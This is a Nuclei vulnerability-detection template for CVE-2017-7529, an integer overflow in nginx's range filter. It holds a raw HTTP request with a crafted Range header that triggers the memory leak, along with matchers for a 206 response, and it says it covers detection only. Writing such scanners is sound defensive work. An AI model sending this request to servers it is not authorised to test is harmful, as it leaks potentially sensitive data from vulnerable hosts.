nuclei-templates/cves/CVE-2017-7529.yaml

32 lines
1.1 KiB
YAML
Raw Normal View History

2020-08-30 04:27:07 +00:00
id: CVE-2017-7529
info:
2020-08-30 04:58:14 +00:00
author: "Harsh Bothra & @dwisiswant0"
2020-08-30 04:27:07 +00:00
name: "Nginx Remote Integer Overflow"
severity: medium
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
2020-08-30 04:58:14 +00:00
# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
2020-08-30 04:27:07 +00:00
requests:
- raw:
- |
2020-08-30 04:58:14 +00:00
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=-17208,-9223372036854758792
Connection: close
2020-08-30 04:27:07 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 206
- type: word
words:
2020-08-30 04:58:14 +00:00
- "Server: nginx"
- "Content-Range"
2020-08-30 05:04:34 +00:00
condition: and
2020-08-30 04:27:07 +00:00
part: header